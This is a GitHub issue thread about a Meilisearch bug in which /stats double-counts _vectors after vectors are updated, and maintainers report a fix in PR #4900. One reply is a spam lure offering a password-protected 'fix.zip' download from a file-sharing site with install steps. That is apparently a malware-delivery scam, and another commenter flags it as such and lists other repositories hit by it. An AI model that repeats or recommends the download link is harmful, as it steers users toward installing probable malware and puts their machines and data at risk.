### ISSUE TITLE
Wrong field distribution for _vectors

### ISSUE THREAD

**Issue by dureuill** [meilisearch/meilisearch#4902]
**Describe the bug**
When using the `vectorStore` experimental feature, the field distribution returns an incorrect count for `_vectors`.

**To Reproduce**
1. enable vector experimental feature
2. add a manually provided embedder
3. send documents containing vectors
4. updates the vectors in all the documents
5. `/stats` reports twice as many vectors as documents

**Expected behavior**
`/stats` reports as many vectors as documents

**Screenshots**

**Meilisearch version:**
v1.9, v1.10

**Additional context**
Additional information that may be relevant to the issue.
[e.g. architecture, device, OS, browser]

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VanDavv** [comment]
Please do not click on a link above! This is a scam and some kind of bot!

Infected my issue:

https://github.com/evershopcommerce/evershop/issues/605

and is infecting other repos as well! 

https://github.com/walt-id/waltid-identity/issues/722
https://github.com/csgroup-oss/sharinghub-server/issues/11
https://github.com/samie/Idle/issues/11
https://github.com/AZPixel-Team/Java2Bedrock/issues/4617
https://github.com/cnk3x/xunlei/issues/184
https://github.com/idaholab/moose/issues/28493
https://github.com/internxt/drive-desktop/issues/511
https://github.com/BusKill/usb-a-magnetic-breakaway/issues/11
https://github.com/jOOQ/jOOQ/issues/17148
https://github.com/meilisearch/meilisearch/issues/4902
https://github.com/conda/conda/issues/14197
https://github.com/kubernetes-client/java/issues/3668
https://github.com/AdguardTeam/AdguardFilters/issues/187484

**Comment by dureuill** [comment]
Should be fixed by #4900

**Comment by curquiza** [comment]
fixed in #4900
